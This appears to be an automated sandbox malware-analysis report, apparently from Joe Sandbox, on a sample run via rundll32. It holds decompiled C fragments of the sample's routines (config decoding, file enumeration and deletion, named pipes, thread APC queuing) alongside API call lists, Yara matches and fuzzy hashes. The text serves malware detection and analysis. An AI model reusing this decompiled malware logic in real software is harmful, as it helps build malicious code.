								_t52 = E049F296E(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E049F3A24(0, _t52) != 0) {
								_t121 =  *0x49fa3cc; // 0x4f795b0
								E049F68F5(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x49fa344; // 0x69b25f44
								_t53 = E049F296E(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x49fa348; // 0x57d5a8
								_t22 = _t54 + 0x49fb252; // 0x616d692f
								 *0x49fa374 = _t22;
								goto L60;
							} else {
								_t64 = E049F3A24(0, _t53);
								 *0x49fa374 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x49fa344; // 0x69b25f44
										_t56 = E049F296E(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x49fa348; // 0x57d5a8
										_t23 = _t57 + 0x49fb791; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E049F3A24(0, _t56);
									}
									 *0x49fa3e0 = _t58;
									HeapFree( *0x49fa2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                                            0x049f475f
                                            0x049f475f
                                            0x049f475f
                                            0x049f475f
                                            0x049f4762
                                            0x049f477f
                                            0x049f478d
                                            0x049f478d
                                            0x049f4792
                                            0x049f47ac
                                            0x049f4a1a
                                            0x049f4a21
                                            0x049f4a25
                                            0x049f4a25
                                            0x049f47b2
                                            0x049f47b7
                                            0x049f47cf
                                            0x049f4a07
                                            0x049f4a11
                                            0x00000000
                                            0x049f47d5
                                            0x049f47d5
                                            0x049f47d6
                                            0x049f47db
                                            0x049f47f1
                                            0x049f47dd
                                            0x049f47dd
                                            0x049f47ea
                                            0x049f47ea
                                            0x049f47f3
                                            0x049f47fc
                                            0x049f47fe
                                            0x049f4808
                                            0x049f480d
                                            0x049f480d
                                            0x049f4808
                                            0x049f4814
                                            0x049f482a
                                            0x049f4816
                                            0x049f4816
                                            0x049f4823
                                            0x049f4823
                                            0x049f482e
                                            0x049f4830
                                            0x049f483a
                                            0x049f483f
                                            0x049f483f
                                            0x049f483a
                                            0x049f4846
                                            0x049f485c
                                            0x049f4848
                                            0x049f4848
                                            0x049f4855
                                            0x049f4855
                                            0x049f4860
                                            0x049f4862
                                            0x049f486c
                                            0x049f4871
                                            0x049f4871
                                            0x049f486c
                                            0x049f4878
                                            0x049f488e
                                            0x049f487a
                                            0x049f487a
                                            0x049f4887
                                            0x049f4887
                                            0x049f4892
                                            0x049f4894
                                            0x049f489e
                                            0x049f48a3
                                            0x049f48a3
                                            0x049f489e
                                            0x049f48aa
                                            0x049f48c0
                                            0x049f48ac
                                            0x049f48ac
                                            0x049f48b9
                                            0x049f48b9
                                            0x049f48c4
                                            0x049f48c6
                                            0x049f48d0
                                            0x049f48d5
                                            0x049f48d5
                                            0x049f48d0
                                            0x049f48dc
                                            0x049f48f2
                                            0x049f48de
                                            0x049f48de
                                            0x049f48eb
                                            0x049f48eb
                                            0x049f48f6
                                            0x049f4909
                                            0x049f4909
                                            0x00000000
                                            0x049f48f8
                                            0x049f48f8
                                            0x049f4902
                                            0x00000000
                                            0x049f4913
                                            0x049f4913
                                            0x049f4915
                                            0x049f492b
                                            0x049f4917
                                            0x049f4917
                                            0x049f4924
                                            0x049f4924
                                            0x049f492f
                                            0x049f4931
                                            0x049f4934
                                            0x049f4935
                                            0x049f493c
                                            0x049f493e
                                            0x049f493f
                                            0x049f493f
                                            0x049f493c
                                            0x049f4946
                                            0x049f495c
                                            0x049f4948
                                            0x049f4948
                                            0x049f4955
                                            0x049f4955
                                            0x049f4960
                                            0x049f496e
                                            0x049f4978
                                            0x049f4978
                                            0x049f4980
                                            0x049f4996
                                            0x049f4982
                                            0x049f4982
                                            0x049f498f
                                            0x049f498f
                                            0x049f499a
                                            0x049f49ad
                                            0x049f49ad
                                            0x049f49b2
                                            0x049f49b8
                                            0x00000000
                                            0x049f499c
                                            0x049f499f
                                            0x049f49a4
                                            0x049f49ab
                                            0x049f49bd
                                            0x049f49bf
                                            0x049f49d5
                                            0x049f49c1
                                            0x049f49c1
                                            0x049f49ce
                                            0x049f49ce
                                            0x049f49d9
                                            0x049f49e5
                                            0x049f49ea
                                            0x049f49ea
                                            0x049f49db
                                            0x049f49de
                                            0x049f49de
                                            0x049f49f8
                                            0x049f49fd
                                            0x049f4a03
                                            0x00000000
                                            0x049f4a06
                                            0x00000000
                                            0x049f49ab
                                            0x049f499a
                                            0x049f4902
                                            0x049f48f6

                                            APIs
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F4804
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F4836
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F4868
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F489A
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F48CC
                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,049FA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 049F48FE
                                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049F49FD
                                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 049F4A11
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: d05b8807500ac208e270f188330bd49e94e410948ee85bd7c301518f55379ea3
                                            • Instruction ID: 3870638d1ebadae7e89f81e7e9eab7d8ce4575b5b14c24bffb2164cf77f32215
                                            • Opcode Fuzzy Hash: d05b8807500ac208e270f188330bd49e94e410948ee85bd7c301518f55379ea3
                                            • Instruction Fuzzy Hash: CB816F70B14204ABDB10EBB8DE84D6F7BEDEBA87147640975E605E3604F679FD808B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580CE21 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(73E806E0,00000000,00000000,73E806E0,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AB8
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AD5
                                            • FreeLibrary.KERNEL32(?), ref: 0580CF57
                                              • Part of subcall function 05810F11: lstrlenW.KERNEL32(?,00000000,?,?,?,0580CE9C,?,?), ref: 05810F1E
                                              • Part of subcall function 05810F11: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0580CE9C,?,?), ref: 05810F47
                                              • Part of subcall function 05810F11: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05810F67
                                              • Part of subcall function 05810F11: lstrcpyW.KERNEL32(-00000002,?), ref: 05810F83
                                              • Part of subcall function 05810F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F8F
                                              • Part of subcall function 05810F11: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0580CE9C,?,?), ref: 05810F92
                                              • Part of subcall function 05810F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F9E
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05810FBB
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05810FD5
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05810FEB
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05811001
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 05811017
                                              • Part of subcall function 05810F11: GetProcAddress.KERNEL32(00000000,?), ref: 0581102D
                                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0580CEAD
                                            • lstrlenW.KERNEL32(?), ref: 0580CEC9
                                            • lstrlenW.KERNEL32(?), ref: 0580CEE1
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 0580CEFA
                                            • lstrcpyW.KERNEL32(00000002), ref: 0580CF0F
                                              • Part of subcall function 0580414B: lstrlenW.KERNEL32(?), ref: 0580415B
                                              • Part of subcall function 0580414B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 0580417D
                                              • Part of subcall function 0580414B: lstrcpyW.KERNEL32(00000000,?), ref: 058041A9
                                              • Part of subcall function 0580414B: lstrcatW.KERNEL32(00000000,?), ref: 058041BC
                                            • FindNextFileW.KERNEL32(?,00000010), ref: 0580CF37
                                            • FindClose.KERNEL32(00000002), ref: 0580CF45
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                            • String ID:
                                            • API String ID: 1209511739-0
                                            • Opcode ID: 98ad7d0bc7f7eddfc94de72dd9586da78e600c389dd1b0a42fa60556b63557fc
                                            • Instruction ID: 361b122c2ee962a5c245aa97bd0b01576fbef586321cde7216268767a9a630e4
                                            • Opcode Fuzzy Hash: 98ad7d0bc7f7eddfc94de72dd9586da78e600c389dd1b0a42fa60556b63557fc
                                            • Instruction Fuzzy Hash: 6F4158721083059BD711EF65DC49A2FFBE8FB88B05F004A29F995E2190DB31DD088BA3
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580FCC0 Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?), ref: 0580FCD8
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0580FD41
                                            • lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 0580FD69
                                            • RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0580FDBB
                                            • DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 0580FDC6
                                            • FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 0580FDD9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                            • String ID:
                                            • API String ID: 499515686-0
                                            • Opcode ID: 63e8a63f9b1282973e9a3c649cdd71c441f42f8b246827ba1b9676177c5c4f05
                                            • Instruction ID: edad845e3200db9b9b92df5b79964c766f8cf9157ac5a6f01c5283bb7c4ed087
                                            • Opcode Fuzzy Hash: 63e8a63f9b1282973e9a3c649cdd71c441f42f8b246827ba1b9676177c5c4f05
                                            • Instruction Fuzzy Hash: 7D41277190020AEBDF61AFA4DC49AAEBFB9FF04314F109065EE11E61A0DB709E85DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580A513 Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,05804E94), ref: 0580A533
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A552
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A567
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A57D
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A593
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0580A5A9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$AllocateHeapLibraryLoad
                                            • String ID:
                                            • API String ID: 2486251641-0
                                            • Opcode ID: 3608728cac86d843750b30b3bf6515b594661e98fbe000eb89d37e97cc7f14b0
                                            • Instruction ID: 5eb06553b390bb293071d335b85dc669f643e091de62072d219516806a998eaa
                                            • Opcode Fuzzy Hash: 3608728cac86d843750b30b3bf6515b594661e98fbe000eb89d37e97cc7f14b0
                                            • Instruction Fuzzy Hash: C61130B12117079FAB20AFAADC85CA6BFECBF142517059426FD46C7251DB38EC40CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05807A1E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 05807A40
                                              • Part of subcall function 0581AD9E: RtlNtStatusToDosError.NTDLL(00000000), ref: 0581ADD6
                                              • Part of subcall function 0581AD9E: SetLastError.KERNEL32(00000000), ref: 0581ADDD
                                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 05807B50
                                              • Part of subcall function 058029B2: RtlNtStatusToDosError.NTDLL(00000000), ref: 058029CA
                                            • memcpy.NTDLL(00000218,058232B0,00000100,?,00010003,00001003,?,00000318,00000008), ref: 05807ACF
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 05807B29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$Status$Last$memcpymemset
                                            • String ID:
                                            • API String ID: 945571674-3916222277
                                            • Opcode ID: ba8c72387275b577848a8e2a95d7e25dd9d2689981d0b08283c55bc4802d2709
                                            • Instruction ID: 8e5d9fa7d5eb2a9efc760c50011c56230f9bc99effcf85ad8f988e7c3674059e
                                            • Opcode Fuzzy Hash: ba8c72387275b577848a8e2a95d7e25dd9d2689981d0b08283c55bc4802d2709
                                            • Instruction Fuzzy Hash: 18318571A01309AFDB60DF54CD99BAABBB9FB04204F10456AED56D7181EB30BE448B50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05808FA6 Relevance: 7.9, APIs: 6, Instructions: 401COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: 723a6d5780d8cbf77dc7e35cf79307f2f9382ea5bb884a50c696cec9f40996b7
                                            • Instruction ID: 1b78ae15009c3aad08146faa85795f506ab1c1f2f9810628450b274b3adb8a85
                                            • Opcode Fuzzy Hash: 723a6d5780d8cbf77dc7e35cf79307f2f9382ea5bb884a50c696cec9f40996b7
                                            • Instruction Fuzzy Hash: 96F1DE30604B99DFCB71CB68C898AAABBF4BF41704F14596DC9E7C7682D231AA45CF10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F515F Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F515F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x49fa30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x49fa2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x49fa2f8 = _t6;
					 *0x49fa304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x49fa2f4 = _t7;
					if(_t7 == 0) {
						 *0x49fa2f4 =  *0x49fa2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                            0x049f5167
                                            0x049f516d
                                            0x049f5174
                                            0x00000000
                                            0x049f51ce
                                            0x049f5176
                                            0x049f517e
                                            0x049f518b
                                            0x049f518b
                                            0x049f51cb
                                            0x00000000
                                            0x049f51cb
                                            0x049f518d
                                            0x049f518d
                                            0x049f5192
                                            0x049f51a4
                                            0x049f51a9
                                            0x049f51af
                                            0x049f51b5
                                            0x049f51bc
                                            0x049f51be
                                            0x049f51be
                                            0x00000000
                                            0x049f51c5
                                            0x049f5187
                                            0x00000000
                                            0x00000000
                                            0x049f5189
                                            0x00000000

                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,049F3D54,?), ref: 049F5167
                                            • GetVersion.KERNEL32 ref: 049F5176
                                            • GetCurrentProcessId.KERNEL32 ref: 049F5192
                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 049F51AF
                                            • GetLastError.KERNEL32 ref: 049F51CE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                            • String ID:
                                            • API String ID: 2270775618-0
                                            • Opcode ID: 42640018cf60fe61f748347959b7099e345fceaede8ace9b32de7b77d79f757d
                                            • Instruction ID: f9fdb1adda6dcb73d2d3c108e4704d00367e0eb6a65b58affac18fe3d4d1bb7c
                                            • Opcode Fuzzy Hash: 42640018cf60fe61f748347959b7099e345fceaede8ace9b32de7b77d79f757d
                                            • Instruction Fuzzy Hash: A1F08CB0748302BBD7244F64AC09F583FA5E704769F124439EA16CA1C1E6B9F840CB18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815188 Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 058151DE
                                            • lstrlenW.KERNEL32(?), ref: 058151EC
                                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 05815217
                                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 05815245
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Query$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3961825720-0
                                            • Opcode ID: f682d1ac7ac777a7898aa01656c9204dc19327e6123b4a2ef001316b7dd488b9
                                            • Instruction ID: 15486d83e0b24f4345906480319f98f245f77eeea74073bc2167a8f36b6a71d9
                                            • Opcode Fuzzy Hash: f682d1ac7ac777a7898aa01656c9204dc19327e6123b4a2ef001316b7dd488b9
                                            • Instruction Fuzzy Hash: 18415A72610209EFDF119F99C885AAEBBACFF44310F108029FD06D6250DB74EE519F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05804DF5 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,05829208,00000001), ref: 05804E19
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05804E64
                                              • Part of subcall function 05816B34: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,0580A82F), ref: 05816B4B
                                              • Part of subcall function 05816B34: QueueUserAPC.KERNEL32(00000000,00000000,?,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B60
                                              • Part of subcall function 05816B34: GetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B6B
                                              • Part of subcall function 05816B34: TerminateThread.KERNEL32(00000000,00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B75
                                              • Part of subcall function 05816B34: CloseHandle.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B7C
                                              • Part of subcall function 05816B34: SetLastError.KERNEL32(00000000,?,?,05801B71,05807E45,00000057,00000000), ref: 05816B85
                                            • GetLastError.KERNEL32(0580C7AE,00000000,00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05804E4C
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05804E5C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                            • String ID:
                                            • API String ID: 1700061692-0
                                            • Opcode ID: 2d9a123ea61fb2b65d2b74bd5a3f784eeb9c820bbbe2fe5c799b8b2bd3de03f8
                                            • Instruction ID: ec0070d6d786c14f778f264cdd179ea6c9a9379df649fd31eaf045854b2ce8ca
                                            • Opcode Fuzzy Hash: 2d9a123ea61fb2b65d2b74bd5a3f784eeb9c820bbbe2fe5c799b8b2bd3de03f8
                                            • Instruction Fuzzy Hash: A2F0F471345210AFE7A05BA99C4EE773F98EB84374F110234FEA6C22E0CB602C958675
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581264B Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0581265F
                                            • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0581269F
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 058126A8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$InformationLastQueryStatusThread
                                            • String ID:
                                            • API String ID: 2450163249-0
                                            • Opcode ID: b176fe1d5fb51a60f45121c7a7663450a6a2850e5380e86f4022628d0a9b5043
                                            • Instruction ID: 6484ed4880f5b984d8fd59cedc810d59415aa6593f518070050929d8c308e5f3
                                            • Opcode Fuzzy Hash: b176fe1d5fb51a60f45121c7a7663450a6a2850e5380e86f4022628d0a9b5043
                                            • Instruction Fuzzy Hash: 6501DA75640208BBEF11AA96DD05DAEBBBEEB84700F004065FD42E2050EA7599149B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05801B92 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 05801BC3
                                            • RtlNtStatusToDosError.NTDLL(C000009A), ref: 05801BFA
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                            • String ID:
                                            • API String ID: 2533303245-0
                                            • Opcode ID: 84b874864412965690f3724c7adf7ee1d6ac0ff326908731be53d3506fad5e16
                                            • Instruction ID: 558c18fdf4176d3a966f1d5be016cad8ad002f64ecf0723e6eea705bfb4197a7
                                            • Opcode Fuzzy Hash: 84b874864412965690f3724c7adf7ee1d6ac0ff326908731be53d3506fad5e16
                                            • Instruction Fuzzy Hash: F501A736906124ABE775AA598D2CEAEBA69EFC5B65F015018FD02E7140FB30CD00D6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580A085 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0580A0A4
                                            • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 0580A0BC
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: InformationProcessQuerymemset
                                            • String ID:
                                            • API String ID: 2040988606-0
                                            • Opcode ID: d4425b219cfc80600c44a300b9f745a91fbc37c4974e37965bac7eb9c664d458
                                            • Instruction ID: 82aa1b3dd4b2e96e439654ef1adbec3756871fd027d8fb8d1d265af30d4d774b
                                            • Opcode Fuzzy Hash: d4425b219cfc80600c44a300b9f745a91fbc37c4974e37965bac7eb9c664d458
                                            • Instruction Fuzzy Hash: 33F04FB6A4021CAADB20DA95CC49FEFBB6CEB05740F008060FE08E6090E770DF448BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581AD9E Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 0581ADD6
                                            • SetLastError.KERNEL32(00000000), ref: 0581ADDD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Error$LastStatus
                                            • String ID:
                                            • API String ID: 4076355890-0
                                            • Opcode ID: d1d2632f18d5d28eac3c582d73bb5ce9a6fb2b6ec862d6e0281efc95bdea8dce
                                            • Instruction ID: 1c5ce9d48f25c85770b40827afb8ab06fded3e210fc42a4c25c4c8b074178107
                                            • Opcode Fuzzy Hash: d1d2632f18d5d28eac3c582d73bb5ce9a6fb2b6ec862d6e0281efc95bdea8dce
                                            • Instruction Fuzzy Hash: E9F0F471521309FBEF15CBD5D91AFAD7ABCEB14345F108048BA01E6080EBB4AB04DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581B628 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 0581B655
